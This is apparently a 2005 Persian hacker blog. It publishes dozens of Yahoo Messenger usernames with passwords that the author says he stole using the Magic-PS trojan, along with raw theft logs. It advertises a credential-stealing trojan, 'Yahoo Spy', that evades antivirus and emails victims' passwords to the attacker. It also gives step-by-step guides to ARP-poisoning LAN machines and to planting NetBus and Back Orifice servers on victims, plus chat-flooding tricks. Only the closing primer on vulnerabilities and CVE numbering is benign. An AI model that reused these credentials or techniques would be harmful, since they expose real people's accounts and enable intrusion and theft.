اين برنامه كه كاملا واضحه كه يه Ip scanner فوق العاده قوي هستش و بكار هكرها مياد !!!!

دانلود

---------------------------------------------------------------------------------------------------------------

اینم magic ps که ببین چه میکنه من انارو از بر نامه magic ps هک کر دم اینا id & password یاهو هستند منم گزاشتم تا شما از اینا استفاده کنید

               hack magic ps id & passworde yahoo masenger


id                                                            [password]

morteza_5122000 [mahdie]

cheshmane_ghamgin_88 [naz777par1367]

amin_shoti [666666]

farid_wolf2005 [chitoz]

teh_qeen2000 [farzad]

akoo666 [000222]

tarkan_wow [000222]

nari_3pac_farz [ /.,'; ]

bazshokonjed [farhadkhare]

brigthstarr2010i [787878]

dont_ganna_get_me [kosepedaret]

fantastikgirl_buld [2234118]

fageheh1798 [fatahi69]

batodaramiyane_atrosokoot [ kishom@tshodam ]

melica_o2 [ 000000]

jennifer_lopez_22003 [mahnaz]

iman_ahwaz2002 [radanradan]

hassoon_sia [miladmasih]

nima_tamiz [samansaman ]

eshge_khab_roya [vahidi]

lab_tou_lab [vahidi]

akoo666 [000222]

tara_p_1365 [namana]

roza_rezaeian2000 [miladmasih]

media_player20002000 [+--++--+]

sanaz_khoshtip_2005 [rozamajid]

sia_saketi50 [miladmasih]

bahar_m92 [474460]

hasti_m92 [maryam]

gaygay64 [qqqqqq]

tanaz_2004sh [soosan samira]

sh_girlc [sepideh]

siyamaksiyamaki [s1357sss]

sinalotfavar [838955]

roiaye_sina [838955]

gir_nikey_2005_2003 [ p2]

sange_saboor2007 [taraneh]

sheytonak_nghola [dokhtarekhoob]

lossifer_mamani [121314]

black_roze82 [333333]

niloofar958 [namayan_12]

dokhtare_malos2001 [tehran]

dida_shitsa [123456]

buseye_dagh [mi3375]

riveside_20052002 [maryam]

moshtage_m45 [qwerty]

popi_h70 [mehraban]

sina_fifiy_CENT [sinameharan4450124]

jennifer_lopez_22003 [mahnaz]

poya21000 [09163003657]

babak_alterego [44337943]

fantastikgirl_buld [2234118]

firegirl_666200220012001 [54020229]

girl_niky_2005_2003 [ p2 ]

poya21000 [09163003657]

rapnader_shahraknaft [1985420pop]

forman_10 [7511157028]

dokhtare_golforoush [dja l i gator]

aroose_siyah_poosh [senegal]

diba_shitsa [sengal]

loosifere_mmammani [okhtapost]

cupiid_zeus [123456]

sayeh_samira [434462]

pedram_she [11175a]

guitybehzadi [g8324578]

kooghooloo_avarh [260102]

perty1010 [montazer]

par0o_sm [525sameh]

ronak_2021 [2002200]

sange_saboor2007 [taraneh]

ronak_sm22 [6101sameh]

serenitianthem_amuck [445566]

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 2:22 توسط محمد هکر |

ترفتدهای ياهو

سلام . می ريم سر اصل مطب :
۱. رفتن به چت روم يک ايميل : روی ايميل مورد نظر راست کليک می کنيم و گرينه ی join user in yahoo کليک می کنيم
۲.massage دادن به افراد يک گروه : روی گروه کليک سمت راست کرده گزينه ی send massege to all in this group را انتخاب می کنيم .
۳. طريقه ی فهميدن invisable بودن ايميل ها : روی invite to conferance در راست کليک می کنيم بعد اگر پيغام no thanks داد تو اينترنت اگر نه تو اينتر نت نيست

-------------------------------------------------------------------------------------

---------------------

سلام به دوستانه خوبم

اگه میخواهیدipیک سایت رابدست اورید دستور پایین رو انجام بدید

در قسمت run رفته و کلمه ping http://www.xxxxxxx.com/ وبجایه کلمه xxxxxxx اسمه سایتی که میخواهد ip ان سایت را بدست اورید بنویسید

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 1:54 توسط محمد هکر |

چگونه قفل ايميل خود را باز کنيم

سلام . باز هم با دستی پر برگشتم .. وقتی ايميل شما قفل می شه ( نه وقتی که براش بامبر پست کردند) وقتی user و password خودتون رو می ديد يک ارور به شما ياهو می ده به اين شکل your email has been locked بعد يک سايت رو پايينش می نويسه که شما بايد روی اون کليک کنيد تا بتونبد ايميل خودتون رو باز کنيد بعد شما به يک صحفه مثل صحفه ی login ياهو می ريد که علاوه بر جايی که برای وارد کردن userوpass جايی هست که بايد کلمه ای را که خود ياهو مانند يک عکس در زيرش گذاشته را وارد کنيد .. با اين کار (اگر userوpassرو درست وارد کرده باشيد) ايميل شما باز می شود در غير اين صورت ايميل شما بامب شده است و راهی برای درست کردنش وجود ندارد .

خدمت به شما وظيفه ی من است

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 1:49 توسط محمد هکر |

سایت هک

سایت

shabe_niloofari35 (7/19/2005 8:20:41 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=shabe_niloofari35 PASS=aaaaaa IP=192.168.0.245 OS=WinXP Service Pack 1 ==> ComputerName=SYSTEM8 ==> WinUSER=Sazegar4

karoon021 (7/19/2005 12:48:05 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=karoon021 PASS=va alimbh IP=192.168.1.84 OS=WinXP Service Pack 1 ==> ComputerName=S4 ==> WinUSER=Sazegar4

diabl0_diabl0 (7/19/2005 12:43:11 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=diabl0_diabl0 PASS=09163037039 IP=192.168.1.86 OS=WinXP Service Pack 1 ==> ComputerName=SAZEGAR4 ==> WinUSER=Sazegar5

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 1:23 توسط محمد هکر |

سایت هک و هک کردن گیم نت

سایت

---------------------------------------------------------------------------------------------------------------

میخای سایت بزنی بیا تو

---------------------------------------------------------------------------------------------------------------

هک کردن گیم نت

يكی از روشهايی كه شما می توانيد در يك LAN يك سيستم را از شبكه با يك خط فرمان خار ج كرده و آنرا از امكانات شبكه محروم كنيد استفاده از دستور ARP در تمامی سيستم عاملهای WIN وجود دارد و كار آن نمايش آدرس فيزيكی و يا اضافه كردن آدرسهاي فيزيكي بصورت دستي سيستم مي باشدو هر شبكه جهت ارسال اطلاعات علاوه بر داشتن آدرس IP آن نياز به داشتن آدرس فيزيكي نيز هست حال هنگاميكه شما يك آدرس فيزيكي را بصورت اشتباه در ليست سيستم وارد كنيد سيستم از تمامي آن سيستمها قطع مي شود.با فرض مثال شنا آدرس IP سيستم Server را با آدرس فيزيكي اشتباه وارد كنيد حال ديگر سيستم از شبكه جدا شده است اگر با فرض مثال سيستم شما جزيي از يك Lan بوده است حال ديگه هيچ خبري نيست نه بست مي رود نه بسته اي مي آيد اگر دوست داريد مطمئن باشيد از اين عمل مي توانيد آنرا درون فايل Autoexec.Bat وارد كنيد از حالا به بعد هر موقع كه ويندوز بالا مي آيد يك مهر تاييد بر ليست قبلي مي زند.حال تنها ترين روش براي وارد سيستم اين است كه ويندوز را عوض كنند البته نه براي شما براي مسئول شبكه كه نمي داند چه خبره!!!!!!به مثال زير توجه كنيد(سعي كنيد در هنگام اتصال به اينترنت اين كار را انجام ندهيد..):براي اجراي اين دستور از منوي Start بر روي گزينه Run كليك كنيد و بنويسيد Command سپس اينتر بزنيد حال در اين صفحه باز شده بصورت زير عمل كنيد.

Arp -a : كار اين دستور نمايش ليست آدرسهاي فيزيكي به همرا IP آدرس سيستم ها است توجه كنيد چنانچه هيچ آدرس فيزيكي در ليست شما وجود نداشته باشد پيغام زير ظاهر مي شود.

C:\> Arp -a
No ARP Entries Found

c:\> Arp -a
Interface: 0.0.0.0 on Interface 0x2
Internet Address Physical Address Type
static 192.168.1.1 00-22-66-88-77-55

Arp -S 192.168.1.1 00-55-88-41-35-EA : كار اين دستور به همراه اين سوئيچ(S) اين است كه شما يك آدرس IP را با يك آدرس فيزيكي به ليست آدرسهاي موجود درآن وارد مي كنيد. توجه كنيد كه هنگام وارد آدرس فيزيكي اشتباه با يد اين آدرس 6 بايت باشد يعني 12 عدد كه بصورت دو تايي آنها را از هم با خط فاصله جدا مي شوند.حال چنانچه دلتان بحال مسئول شبكه مي سوخت و مي خواستيد كه زياد اذيت نشه با دستور زير آنرا پاك كنيد.

ARP -d 192.168.1.1 : بايد در جلوي دستور پس از نوشتن d- آدرس IP را كه مي خواهيد آدرس فيزيكي مربوط به آن پاك شود بايد نوشته شود.

Wacker

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 1:23 توسط محمد هکر |

تر فند

قبل از هر چیزی این ترفند رو می تونید توکافینت استفاده کنید

اگر شناخت کاملی بر جیستر نداید بهتر است که یک نسخه پشتیبانی بکاپ بگیرید

خوب در س امروز رشروع می کنیم

از منوي Start گزينه Run را انتخاب كنيد و Regedit را تايپ كنيد تا داخل محيط ويرايش ريجستري شويد حالا به اين كليك در ريجستري برويد :

و بعد ان مسیر بروید

HKEY_CURRENT_USER\Software\Yahoo\Pager

و روی Save Password دو بار كليد كنيد و عدد 100 را در آن تايپ كنيد و OK بزنيد حالا

ياهو مسنجر را نگاه كنيد آخرين ID و Password ID می بينيد می توانيد باآن LOGIN

و حالا به وسیله ی یک برنامه که پسور ستاره ای وینوز رو به شما نشون دهد استفاده کنید که از این جور برنامه ها زیاد است مثل 007

/

2 نوشته شده در يکشنبه بيست و هشتم فروردين 1384ساعت 15:43 توسط محسن ترفند | یک نظر

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 1:20 توسط محمد هکر |

تریقه بدست اوردن ip

سلام به دوستانه خوبم

اگه میخواهیدipیک سایت رابدست اورید دستور پایین رو انجام بدید

در قسمت run رفته و کلمه ping www.xxxxxxx.com وبجایه کلمه xxxxxxx اسمه سایتی که میخواهد ip ان سایت را بدست اورید بنویسید

نظر یا دتون نره

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 1:12 توسط محمد هکر |

yahoo spay

بالاخره نسخه کامل برنامه Yahoo Spy آماده شد و مشکلاتی که در نسخه آزمایشیه آن وجود داشت بر طرف شد. در نسخه قبلی مشکل کوچیکی وجود داشت و پسوردها به ایمیل ارسال نمیشد ولی در این نسخه تمامی مشکلاتش حل شده و اگر یادتون باشه گفته بودم که برنامه قادره رمز ذخیره شده در یاهو مسنجر را برای شما بصورت کد ارسال کنه و روشی را برای دیکد کردنش گفتم اما آقا مهرداد زحمت کشیدند و در این نسخه یه برنامه دیکدر هم براتون ساختند که کافیه آیدی و کدی که به ایمیلتان ارسال میشه را به برنامه بدید و روی کلید start کلیک کنید تا برنامه کد را برای شما به رمز اصلی بتدیل نماید و به شما نمایش دهد. همچنین قابلیت اضافه کردن آیکون و تغییر نام فایل ساخته شده و افزودن و کم کردن قابلیتهای فایل ساخته شده هم به برنامه اضافه شده و البته همونطور که در عکس برنامه و در خود برنامه میبینید ۴ قابلیت برنامه غیر فعاله و در نسخه های بعدی آماده میشه . پس اگر میخواهید قدرتمندترین تروجان را در اختیار داشته باشید هر چه سریعتر دانلود کنید.

توجه۱ : چنانچه از یاهو مسنجر نسخه ۵ استفاده میکنید هنگام Decode کردن رمز احتمال داره که مسنجر شما بطور اتوماتیک با آیدی فردی که هک شده لوگین بشه . شما در این لحظه باید بدون اینکه پنجره برنامه Decoder را ببندید ٬ مسنجر را Logout نمایید و پس از Logout کردن مسنجر ٬ برنامه Decoder رمز عبور آیدی مورد نظر را به شما نشان میدهد.
توجه۲ : در این نسخه ٬ برنامه رمز اشتراک اینترنت را نیز ارسال میکند ولی رمزهایی کسانی را میفرسته که از طریق internet explorer به اینترنت وصل میشوند و رمزهای کسانی که از کاننکشن ویندوز به اینترنت وصل میشودن را نمیفرسته ولی در نسخه بعدی قابلیت ارسال تمامی رمزهای اشتراک اینترنت هم اضافه میشه .

قابلیتها :
۱- پنهان بودن در Task manager(اولین تروجان ایرانی با این قابلیت)
۲- پنهان در برنامه هایی که استارت آپ شما را مونیتور میکنند .
۳-قربانی نمیتواند آن را به آسانی از سیستم خود پاک کند.
۴- هیچ ویروس یابی نمیشناسش.
۵- از همه فایروالها رد میشه.
۶- رمزهای بدست آمده را به ایمیل شما ارسال میکند.
۷- رمزهای یاهو مسنجر و Msn , Ftp , رمز Dialup را برای شما میفرسته.
۸- رمزهای یاد شده را در همان لحظه اجرای برنامه و در کمتر از ۵ ثانیه ارسال میکنه.
۹- به تمام سرورهای ایمیل قادره ایمیل بفرسته .(Yahoo,Hotmail,Msn,Google,...)
۱۰- وقتی قربانی سعی در پاک کردن آن داشته باشه رجیستری قربانی را غیر فعال میکند.
۱۱- روی تمام ویندوزهای ۹۵ به بالا کار میکنه و حتی روی لانگهورن هم کار میکنه.
۱۲- روی تمام نسخه های یاهو مسنجر کار میکنه و حتی توپی های جای پسورد یاهو هم تغییر نمیده و هیچ جای شکی به جا نمیذاره.
۱۳- غیر فعال کردن برخی از برنامه های ویروسیاب
۱۴- توسط پکر جدیدی درست میشه و هیچ ویروسیاب و تروجان یاب و ... نمیتونه پیداش کنه.
۱۵- در کمتر از ۵ ثانیه ایمیل را ارسال میکنه.

دانلود(برای هک کردن پسوردها)

دانلود(برای Decode کردن رمزهای ارسالی)

دانلود(برای چسباندن دلخواه فایل به تروجانی که میسازید)

Yahoo Spy Contain:
1- Hide Of TaskManager.
2- Hide of Startup Monitors.
3- User Can't Delete it Easy.
4- AVS can't Detect it.
5- Firewalls Can't Stop it.
6- Send To Mail Box.
7- Send Yahoo,Msn,FTP,Dial Password.
8- Disable Registry Editor when user try for delete it.
9- Send To All Mail Servers. (Yahoo,Hotmail,Msn,Google,...)
10- Full Supporting win 9x-me-nt-2k-xp-2k3 and LongHorn.
11- Fixed for all Versions of yahoo messenger 5x-6x.
12- Recover Asterisk XP/2000 Password Very Nice without change password icon.
13- Destroy Some Monitors Software
14- Pack With New Packer and AVS can't Detect it.
15- Send Mail Very Fast. (less than 5 second).

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 0:54 توسط محمد هکر |

شکل یاهو

شکل ياهوی خود را عوض کنيد

۱.برين به ياهو مسنجرتون و اين کارهايی که می گم رو پله به پله انجام بدين برين توی loginبعد برين توی pereferences بعد برين توی appearance بعد يک تکست به نام current theme می بينيد که جلوش گزينه هايی است که قابل تغيير است آن را روی حالت custom قرار داده وok را بزنيد....

اين هم از اين از اين به بعد منتظر اسکينهايی که خودم می سازم باشيد فعلن خداحافظ

نظر بدین

+ نوشته شده در سه شنبه بیست و هشتم تیر 1384ساعت 0:45 توسط محمد هکر |

هک کردن يک سايت

قبل از سلام اگه در مورد هک سايت چيزی نميدونی اينو نخون! ان از طرف منه من برا سیستمه خودتون میگم
سلام
برای هک کردن يه سايت به ترتيب از راه داس به شرحه زير است:
۱.بعد از انصال به شبکه٬ميری تو داس و به شکل زير عمل ميکنی:
C:\>telnet http://www.domail-name.com/ 79
بجای domain-name اسم سایتی که می خوای هکش کنی مینویسی.اگه پورت ۷۹ که در آخر آدرس مورد نظر نوشتی در سرور باز باشه شما وارد ميشويد و گرنه نميشه
۲.اگر پورت باز بود و شما وارد شديد مشغول خراب کاريتون بشين اونش ديگه به من ربطی نداره می خوای چه بلايی سر سايت بياری.
**نکته**:
۱.اگر در هنگام خراب کاری متوجه شدين سرعت سيستمتون خيلی کم شد سری خارج شو.
۲.اگه از ترس اينکه پيدات کنن٬بعد از خراب کاريت فورا ريست نکن.اول ديسکانکت بعد ریست.
۳.همون طور که اول گفتم اگه چيزی از هک سايت و فرمانهای داس نميدونی اصلا بهت توصيه نميکنم اين کارو بکنی.
۳.اينکه من هيچ مسئوليتی ندارم.

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 23:54 توسط محمد هکر |

آموزش حال گیری(اینم یه جورشه دیگه)

آقا شما دارید در روم چت می کنید , حال نمی کنید یک یا حتی چند نفر خاص در روم

باشند.

خوب... کافی این کار رو انجام بدید:

این فرمان رو که نوشتم چند بار به سرعت در روم وبعد کنید

اما فرمان:invite******/:

که به جای****** باید ID طرف رو بنویسید.

البته این کار باید به وسیلهyahoomessenger باvesion بالاتراز5.5 انجام بشه.

اگرهم دیدید طرف می خوات زرگبازی دربیاره هیچ خیالی نیست.این کار کنید:

شما این فرمان را سریع بفرستد:

0kfd11-u5vqvs-n38a65-fkiv84

این دفه مطمن باشید طرف با پای خودش از روم میره بیرون. (اینه!!!)

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 23:48 توسط محمد هکر |

اینارو با magic-ps هک کردم

rapnader_shahraknaft (7/18/2005 9:51:34 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=rapnader_shahraknaft PASS= 420pop IP=192.168.1.86 OS=WinXP Service Pack 1 ==> ComputerName=SAZEGAR4 ==> WinUSER=Sazegar5
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
farmandi_room (7/18/2005 9:50:17 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=farmandi_room PASS= r a o . o f IP=192.168.1.84 OS=WinXP Service Pack 1 ==> ComputerName=S4 ==> WinUSER=Sazegar4
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
benyamin_mxw5000 (7/18/2005 9:48:27 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=benyamin_mxw5000 PASS= b r 5 o i IP=192.168.1.84 OS=WinXP Service Pack 1 ==> ComputerName=S4 ==> WinUSER=Sazegar4
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ard_shab (7/18/2005 9:45:50 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=/\/\ard_shab PASS=r o o IP=192.168.1.84 OS=WinXP Service Pack 1 ==> ComputerName=S4 ==> WinUSER=Sazegar4
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
morche_mast2005 (7/18/2005 9:41:31 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=morche_mast2005 PASS=r o o IP=192.168.1.84 OS=WinXP Service Pack 1 ==> ComputerName=S4 ==> WinUSER=Sazegar4
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ali_jeegar666 (7/18/2005 9:04:10 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=ali_jeegar666 PASS=2257288 IP=192.168.1.84 OS=WinXP Service Pack 1 ==> ComputerName=S4 ==> WinUSER=Sazegar4
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
sam_modern_n (7/18/2005 8:45:28 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=sam_modern_n PASS=16241624 IP=192.168.1.86 OS=WinXP Service Pack 1 ==> ComputerName=SAZEGAR4 ==> WinUSER=Sazegar5
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
shabe_niloofari35 (7/18/2005 4:14:56 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=shabe_niloofari35 PASS=miladmasih IP=192.168.1.86 OS=WinXP Service Pack 1 ==> ComputerName=SAZEGAR4 ==> WinUSER=Sazegar5
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

shabe_niloofari35 (7/18/2005 1:37:52 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=shabe_niloofari35 PASS=miladmasih IP=192.168.1.86 OS=WinXP Service Pack 1 ==> ComputerName=SAZEGAR4 ==> WinUSER=Sazegar5
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
sia_saketi50 (7/18/2005 1:14:26 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=sia_saketi50 PASS=miladmasih IP=192.168.1.86 OS=WinXP Service Pack 1 ==> ComputerName=SAZEGAR4 ==> WinUSER=Sazegar5
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
shabe_niloofari35 (7/18/2005 1:01:30 AM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=shabe_niloofari35 PASS=miladmasih IP=192.168.1.86 OS=WinXP Service Pack 1 ==> ComputerName=SAZEGAR4 ==> WinUSER=Sazegar5
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
hakoo_vox001 (7/17/2005 11:13:41 PM): This ID Hacked by : Magic-PS v1.5 SE++ ===> USER=hakoo_vox001 PASS=012345678910vox IP=192.168.1.86 OS=WinXP Service Pack 1 ==> ComputerName=SAZEGAR4 ==> WinUSER=Sazegar5

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 22:50 توسط محمد هکر |

اوز کردن ip

برای امنیت بیشتر و حفاظت از منافع شخصی خود در کشور های خارجه مردمی که کارهاشون مهم هست و احتیاج به امنیت شخصی بروی اینترنت دارند ٬ ماهانه یک مبلغی به کمپانی ها میدن که قابلیت anonymous surfing رو براشون محیا کنند. حالا اون عزیزانی که نمیدونند anonymous surfing چیه بهتره بدونند که یک سیستمی هست که IP رو تغییر میده تند تند ٬ تا کسی نتونه شمارو ردیابی کنه.
مثلا اگه الآن شما ایران زندگی میکنید وارد یک سایت بشید که بخواد شما رو ردیابی کنه ٬ سریع تمامی اطلاعات مورد نظرتون از طریق IP تون ذخیره میشه.

حالا این نرم افزار چیکار میکنه؟
میاد IP شما رو پنهان میکنه و دیگه شمارو از خرید سرویس anonymous surfing و خیلی مشکلات دیگه از جمله هکرها خلاص میکنه...

توضیحات کامل رو میتونید دراینجامشاهده کنید.

1.08 مگابایت

دانلود

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 22:35 توسط محمد هکر |

هک

سلام دوباره به شما عزيزانمحمد هکر اخرشه

.شما با اين آموزش می توانيد بدون ارسال فايل و کاملا باکلاس پسورد اینترنت مردم رو هک کنید.اينم بگم كه این کار خیلی بی رحمانه هست و به من هیچ ربطی نداره!!!!!!!!
ما به این برنامه ها احتیاج داریم که همش تو خود ویندوز هست: BACK ORFICE. Wingate.Netbus.Telnet
اول وارد Wingate شده و در جایی که نوشته شده HOST NAME آی پی قربانی رو قرار می دیم و در قسمت بعدی به Scan port رفته و Defualt برنامه که Port 23 هست رو به 12345 تغییر میدهیم و گزینه سوم که try to open port only هست را انتخاب و اسکن رو بزنید. البته در اينجا ميتونيد از يه RANGE IP هم استفاده كنيد وهم مي تونيد اي پي قرباني رو بدهيد و در صورت باز بودن پورت ميتونيد مراحل بعدي رو اجرا كنيد. حالا ما فرض رو بر اين ميذاريم كه يه Range Ip دادیم. بعد از اسکن شما با قسمتی به نام Server Found مواجه می شوید که یکسری آی پی را با پورتهای باز مورد نظر شما پیدا کرده که در ادامه باید یکی از آی پی هارو به دلخواه انتخاب کنید.
در قسمت بعدي NETBUS را باز كرده و در جاي Hostname/IP اي پي مورد نظر را وارد كنيد و در ادامه ي كار اگر از شما پسسورد بخواهد بايد از Telnet استفاده كنيد و اگر نخواهد كه كار تقريبا تمومه . حالا فرض ميكنيم كه پسسورد خواست بايد مراحل زير را طي كنيد:

به قسمت RUN رفته و CMD را اجرا كرده و بعد Telnet را اجرا كنيد و اي پي را نوشته و بعد از پرت 12345 استفاده كنيد در پنجره Netbus براي كرك پسوورد اين نوشته را وارد كنيد: Password;1;123serverPWD;Y4hoo

شما ميتونيد پسورد ديگه اي هم بذاريد حالا با Netbus دوباره وصل شده و پسورد را Y4hoo ميزنيد

همه چيز در دست شماست

حالا به قسمت File Manager رفته و سرور را به سيستم طرف ارسال كنيد و در قسمتي كه از شما پرسيد سرور را به كجا بفرستم شما ادرس C:Windows را ميدهيد .و قسمت دانلود را ميبنديم . حالا كارمون با Netbus تموم شد .

حالا به BACK ORFICE ميريم و در قسمت Target Host اي پي طرفو ميزنيم و پرت 12345 و باز در قسمت بعدي پسورد را زده و SEND را ميزنيم

با اين روش كارهاي زيادي ميشه انجام داد !
امیدوارم که خوشتون اومده باشه. تا مقاله بعدی فعلا بای

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 14:40 توسط محمد هکر |

اموزش

Vulnerability يا به‌صورت مختصر vul را در فارسي حفره يا سوراخ امنيتي مي‌گيم. اين عبارت رو بايد يه کم توضيح بدم. فرض کنيد که يه نرم‌افزار داريم که يه پورتي رو باز مي‌کنه. وقتي اين نرم‌افزار قرار هست که منتشر بشه، شرکت سازنده يه سري تست رو نرم‌افزار انجام ميده که مشکلي نداشته باشه. بعد که اطمينان نسبي خاصل شد، نرم‌افزار ارائه مي‌شود و سرورها و کلاينت‌ها از اون نرم‌افزار و از اون ورژن خاص شروع به استفاده مي‌کنن. بعد از اينکه نرم‌افزار منتشر شد، گروه‌هاي مختلفي که در سراسر جهان هستند و کارشان تست امنيتي اين نرم‌افزارهاست شروع به فعاليت مي‌کنند. اين گروه‌ها هر چند وقت يک بار موفق به يافتن نقاط ضعفي در اين برنامه‌ها مي‌شوند و اونو گزارش مي‌کنن. سايت‌هايي هستند که کارشون به‌طور عمده گزارش جديد‌ترين vul هاي کشف شده است. مثلا ممکنه در سايت‌هايي مثل securitytracker.com يا securityfocus.com و ... به عبارتي مثل :

A vulnerability was reported in ...

برخورد کرده باشيد. اين بيان مي‌کنه که يه vul جديد کشف شده است. دقت کنيد که اين vul از وقتي نرم‌افزار طراحي شده با اون بوده ولي کسي از اون خبر نداشته تا وقتي که اين گزارش منتشر بشه! پس اين گروه‌ها کارشون کشف باگ هستش نه اختراع باگ!
همچين نرم‌افزاريي رو vulnerable مي‌گن. يعني قابل نفوذ.
اين vul ها انواع مختلفي دارند و ميشه اونا رو catagorize (طبقه‌بندي) کرد. اين بحث رو بعدا به‌طور کامل مطرح مي‌کنم. عجالتا بهتره کمي هم راجع به exploit صحبت کنم:

- exploit چيست؟

فرض کنيد که يکي مياد و يه باگ رو کشف مي‌کنه. اين کشف vul معمولا فقط در حد يک گزارش مي‌مونه تا اينکه يکي همت کنه و روشي براي exploit کردن اون vul درست کنه. پس vul جنبه تئوري قضيه است و exploit قسمت عملي اون. exploit مي‌تونه يه کد (معمولا به زبان‌هاي سي و پرل ) يا يه دستورالعمل يا يه url و ... باشه. وقتي شما مطمئن مي‌شين که فلان سرور از فلان ورژن فلان نرم‌افزار استفاده مي‌کنه که اون نرم‌افزار فلان vul رو داره، يا بايد exploit بسازيد و يا اينکه يه exploit واسه اون از اينترنت پيدا کنيد.
نتيجه اينه که ممکنه يه vul کشف شده باشه ولي exploit واسه اون نباشه. حتي من ديدم که سايت‌هاي مطرحي مثل Cert ميان و قلم فرسايي مي‌کنن که فلان vul قابل exploit کردن نيست ولي بعد exploit نوشته ميشه و اينا ضايع مي‌شن!! البته بگذريم که نمونه‌هايي از vul ها رو داريم که هرگز براش exploit نوشته نشده باشه.

- vul ها رو چگونه نام‌گذاري مي‌کنند؟

اولين نکته‌اي که بايد بگم، اينه که براي هر Vulnerability يک شماره يا يک نام نسبت مي‌دن. اين شماره يا نام در واقع يک استانداردي است که به هکرها و متخصصين امنيت شبکه اجازه ميده که حرف همديگرو بفهمن! مثلا ممکنه جايي ببينيد که راجع به NT IIS Unicode Vulnerability صحبت مي‌کنند يا راجع به CVE شماره CVE-2000-0884 يا BID شماره 1806 بحث مي‌کنند. دقت کنيد که همه اينها معادل هم هستند. پس براي يک vul خاص ممکن است شماره‌ها يا عبارت‌هاي معادلي باشد.

۱- CVE اولين جايي است که بايد ببينيد:
فرض کنيد که شما متوجه شده‌ايد که سروري داراي يک vul به شماره CVE-2000-0508 داشته باشد (اينکه چطوري ميشه فهميد يه سرور چه vul هايي داره بعدا بحث خواهم کرد). براي CVE از يکي از آدرس‌هاي زير استفاده کنيد:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=xxxxxxxxxx
http://cgi.nessus.org/cve.php3?cve=xxxxxxxxx

که به جاي xxxxxxxxx بايد شماره CVE رو بنويسيد مثلا CVE-2000-0508 يا مثلا CAN-2002-0651 و...
وقتي به اين آدرس‌ها رجوع کنيد مي‌بينيد که يه سري نام‌ها و شماره معادل براي اين CVE ذکر شده است. به عبارت ديگه واسه اينکه در مورد يک vul مطالبي بياموزيد، اولين کاري که مي‌کنيد رجوع به يکي از دو سايت بالاست. بعد از رجوع به آنها مي‌تونيد لينک‌هايي را استخراج کنيد که به شما اجازه مي‌دن، راجع به اون vul مطالبي رو بياموزيد.
فرض کنيد که يک vul رو که CVE اونو مي‌دونيد در يکي از اين سايت‌ها داريد مي‌خونيد، ملاحظه خواهيد کرد که براي اين CVE بعد از يک توضيح مختصر يک سري اسم و شماره ذکر شده است. اين اسامي ممکن است، BID يا XF يا ... باشد. در واقع براي اينکه در مورد اين vul خاص نکاتي را ياد بگيريد، علاوه بر توضيحات مختصز بالاي صفحه بايد تک تک اين مطالبي که بهشون ارجاع داده شدين، مثل BID مربوطه، XF مربوطه و ... را بخونين. حالا اگه اونحا نوشته باشه:

BID: 1806

از کجا بايد اونو خوند؟ (يعني لينک مستقيمش چي هست؟) همين پايين مهم‌ترهاشو مي‌گم (دقت کنيد که همه اون اسم‌ها معادل هم هستند فقط سايت‌هاي مختلف اسم‌هاي مختلفي را واسه يه vul انتخاب مي‌کنند و ما مي‌خواهيم تمام مطالب مرتبط با يه vul خاص رو از سايت‌هاي مختلف پيدا کنيم )

۲- BID يا BugTraq ID يا همون نفس من بيده! :
فرض کنيد که صفحه مربوط به CVE خاص رو خوندم و اونجا به عبارت BID: 1806 برخوردم. حالا اونو از کجا بخونم؟ از اينجا :

http://www.securityfocus.com/bid/xxxx

که به جاي xxxx بايد يک عدد بنويسيد (همان عدد مربوز به BID ) مثلا به جاي xxxx بنويسيد: 1806
اگه بخوام بهترين محل يادگيري راجع به vul ها رو ذکر کنم، جايي بهتر از www.securityfocus.com واسه اين کار وجود نداره. دقت کنيد وقتي که صفحه مربوط به يک BID خاص رو در اين سايت مي‌بينيد، يک سري لينک به اسم‌هاي info و discussion و exploit و solution را هم بخونين که جنبه‌هاي مختلف اون vul خاص است. مخصوصا قسمت exploit که جايي است که جوجه‌هکرها مي‌تونن با اون حسابي حال کنن! به عبارت ديگه جاييه که واسه اون vul خاص exploit داون‌لود کنيد. خيلي از ابزارهاي هک که تبليغ مي‌شن، در واقع با تغييرات کمي از همين exploit ها بدست مي‌آن!!

۳- XF :
